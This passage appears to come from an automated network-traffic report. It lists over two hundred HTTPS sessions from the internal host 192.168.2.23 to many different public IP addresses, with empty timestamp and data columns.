                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22353192.168.2.234028443.139.216.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22354192.168.2.2340502124.61.195.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22355192.168.2.2350800185.147.157.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22356192.168.2.235026636.132.149.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22357192.168.2.2333578206.188.230.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22358192.168.2.235872644.29.99.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22359192.168.2.2342878107.188.207.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22360192.168.2.235306089.5.154.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22361192.168.2.2334190147.57.109.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22362192.168.2.2349336152.4.102.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22363192.168.2.2338488137.114.31.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22364192.168.2.2356776189.63.92.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22365192.168.2.2357154207.105.109.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22366192.168.2.233439257.186.29.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22367192.168.2.234261690.35.113.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22368192.168.2.2347912137.18.17.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22369192.168.2.2333734174.209.197.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22370192.168.2.2357244133.17.163.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22371192.168.2.2344024124.142.155.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22372192.168.2.2339806145.21.209.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22373192.168.2.234035218.143.43.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22374192.168.2.2344902195.235.31.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22375192.168.2.235432661.237.61.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22376192.168.2.2337530175.10.205.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22377192.168.2.2352058156.72.220.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22378192.168.2.235363435.202.31.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22379192.168.2.2333016113.55.177.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22380192.168.2.2343676209.29.202.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22381192.168.2.233413867.36.210.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22382192.168.2.2347854217.66.80.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22383192.168.2.234322067.139.38.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22384192.168.2.2341914122.149.255.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22385192.168.2.2354006156.136.82.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22386192.168.2.233903052.224.185.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22387192.168.2.2332950121.43.4.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22388192.168.2.2350874189.233.74.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22389192.168.2.235497699.248.132.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22390192.168.2.2337632102.245.44.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22391192.168.2.2344200182.235.32.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22392192.168.2.2359316122.43.221.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22393192.168.2.2346382151.82.83.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22394192.168.2.2348456213.61.89.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22395192.168.2.233862648.210.89.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22396192.168.2.2347274106.186.123.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22397192.168.2.2352402196.98.154.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22398192.168.2.235350298.199.64.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22399192.168.2.2352846120.88.155.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22400192.168.2.2360046109.242.49.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22401192.168.2.233282265.235.71.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22402192.168.2.2336418132.144.101.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22403192.168.2.233436495.9.202.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22404192.168.2.2350194123.60.215.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22405192.168.2.2332914135.3.120.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22406192.168.2.234388260.241.84.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22407192.168.2.234180054.133.246.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22408192.168.2.2332786158.114.227.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22409192.168.2.2341086154.235.141.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22410192.168.2.233324667.86.226.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22411192.168.2.2333588112.99.141.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22412192.168.2.2345884135.53.35.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22413192.168.2.2339338117.35.56.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22414192.168.2.235148620.61.128.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22415192.168.2.2341302134.183.42.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22416192.168.2.2336034102.15.55.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22417192.168.2.233687862.131.152.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22418192.168.2.234102262.149.118.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22419192.168.2.234736661.14.171.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22420192.168.2.234501844.75.68.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22421192.168.2.2347740211.76.40.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22422192.168.2.2352668168.183.11.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22423192.168.2.2334638223.3.194.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22424192.168.2.2340160204.193.190.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22425192.168.2.2348886195.245.233.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22426192.168.2.236035867.5.42.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22427192.168.2.2345042174.192.218.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22428192.168.2.2356414137.186.190.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22429192.168.2.2345556110.186.21.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22430192.168.2.233804864.47.227.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22431192.168.2.2333250114.140.204.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22432192.168.2.234519886.89.136.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22433192.168.2.235284827.124.63.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22434192.168.2.2350364150.134.207.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22435192.168.2.233862239.232.173.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22436192.168.2.234207861.51.239.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22437192.168.2.234567262.63.169.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22438192.168.2.235600049.143.139.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22439192.168.2.2350826189.144.108.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22440192.168.2.233406092.174.228.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22441192.168.2.236086468.141.221.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22442192.168.2.2338714175.51.143.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22443192.168.2.235414899.235.34.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22444192.168.2.2346692179.252.194.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22445192.168.2.2336694151.3.66.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22446192.168.2.233483299.18.232.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22447192.168.2.2344872121.181.41.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22448192.168.2.234147432.36.224.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22449192.168.2.2334948105.116.2.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22450192.168.2.2340586103.99.58.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22451192.168.2.2342292122.18.251.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22452192.168.2.235059059.207.183.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22453192.168.2.234535081.55.56.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22454192.168.2.2352746146.246.240.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22455192.168.2.2341766176.84.230.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22456192.168.2.2343210181.232.119.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22457192.168.2.2333456104.152.20.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22458192.168.2.235937083.122.105.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22459192.168.2.2359798159.106.126.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22460192.168.2.2358690115.244.155.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22461192.168.2.2355474155.108.142.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22462192.168.2.235356252.192.53.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22463192.168.2.2340276109.135.214.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22464192.168.2.234182899.208.116.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22465192.168.2.233277487.75.74.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22466192.168.2.2353564220.157.231.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22467192.168.2.2360336180.167.200.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22468192.168.2.2341182223.34.238.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22469192.168.2.2347992193.32.2.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22470192.168.2.2337428188.141.239.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22471192.168.2.2341520131.225.121.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22472192.168.2.2360084201.125.121.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22473192.168.2.2354990163.114.198.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22474192.168.2.2345704149.179.164.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22475192.168.2.23340665.22.66.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22476192.168.2.233754218.28.36.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22477192.168.2.235712820.69.100.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22478192.168.2.2348002174.204.35.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22479192.168.2.2342846161.184.91.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22480192.168.2.2353006102.104.46.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22481192.168.2.2352134206.27.190.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22482192.168.2.2355506153.40.63.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22483192.168.2.2344610222.76.76.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22484192.168.2.23604904.238.164.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22485192.168.2.235727092.18.144.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22486192.168.2.233595460.217.12.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22487192.168.2.2349716201.168.13.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22488192.168.2.233969024.55.25.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22489192.168.2.2346856112.148.85.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22490192.168.2.234368479.50.58.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22491192.168.2.235480494.40.151.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22492192.168.2.2357408112.2.96.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22493192.168.2.234939413.240.124.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22494192.168.2.2340140193.79.85.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22495192.168.2.234001046.114.135.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22496192.168.2.234067654.52.210.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22497192.168.2.2348480158.107.9.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22498192.168.2.2357536152.153.245.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22499192.168.2.233967650.19.36.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22500192.168.2.235758645.153.103.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22501192.168.2.2339088203.117.146.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22502192.168.2.2346650109.210.238.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22503192.168.2.2333116169.172.102.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22504192.168.2.2343362222.55.79.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22505192.168.2.235195037.237.92.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22506192.168.2.2336892190.180.133.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22507192.168.2.2359678117.221.21.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22508192.168.2.233755484.181.236.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22509192.168.2.233578639.187.24.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22510192.168.2.234281462.193.29.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22511192.168.2.2339078159.173.75.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22512192.168.2.2354198128.87.200.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22513192.168.2.2354834186.141.196.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22514192.168.2.2333110162.245.60.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22515192.168.2.2348202104.79.68.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22516192.168.2.234382062.40.176.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22517192.168.2.2334786182.32.27.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22518192.168.2.2334546115.71.146.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22519192.168.2.235595451.111.18.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22520192.168.2.235123235.201.52.758080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22521192.168.2.2356832208.110.59.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22522192.168.2.2334576129.43.108.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22523192.168.2.2343670192.200.233.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22524192.168.2.235900695.119.95.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22525192.168.2.2343852111.239.24.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22526192.168.2.2339210199.31.224.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22527192.168.2.2356114102.80.174.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22528192.168.2.2353812160.57.139.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22529192.168.2.2349370172.230.142.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22530192.168.2.233662491.134.21.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22531192.168.2.2348614196.55.245.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22532192.168.2.2352614152.111.51.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22533192.168.2.233735276.92.12.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22534192.168.2.2339112216.234.25.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22535192.168.2.2337242211.151.13.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22536192.168.2.2354576206.216.120.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22537192.168.2.233744870.169.113.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22538192.168.2.2359414209.185.165.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22539192.168.2.2355576170.54.115.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22540192.168.2.235184673.146.50.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22541192.168.2.235033443.123.54.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22542192.168.2.2357572119.142.134.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22543192.168.2.2335770122.95.237.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22544192.168.2.23452584.180.57.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22545192.168.2.234095657.220.189.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22546192.168.2.234883812.26.33.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22547192.168.2.2339054158.143.237.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22548192.168.2.234299257.187.91.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22549192.168.2.2348948195.83.217.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22550192.168.2.2356226139.241.68.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22551192.168.2.23423189.144.253.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22552192.168.2.235050264.2.50.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22553192.168.2.235143844.39.248.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22554192.168.2.2346154189.109.226.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22555192.168.2.2341742156.134.196.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22556192.168.2.2344586143.47.42.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22557192.168.2.235451640.36.51.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22558192.168.2.234735673.202.180.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22559192.168.2.236099666.54.57.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22560192.168.2.2359482191.124.25.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22561192.168.2.2342644108.158.238.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22562192.168.2.234632014.228.75.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22563192.168.2.2340992100.0.212.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22564192.168.2.234280077.97.89.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22565192.168.2.235818653.146.112.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22566192.168.2.2356740208.149.65.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22567192.168.2.2345046203.94.202.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22568192.168.2.233630845.211.174.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22569192.168.2.2343424222.93.213.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22570192.168.2.2354560112.90.185.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22571192.168.2.233587892.63.136.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22572192.168.2.2335860203.28.36.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22573192.168.2.235016290.19.75.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22574192.168.2.23412081.203.143.190443
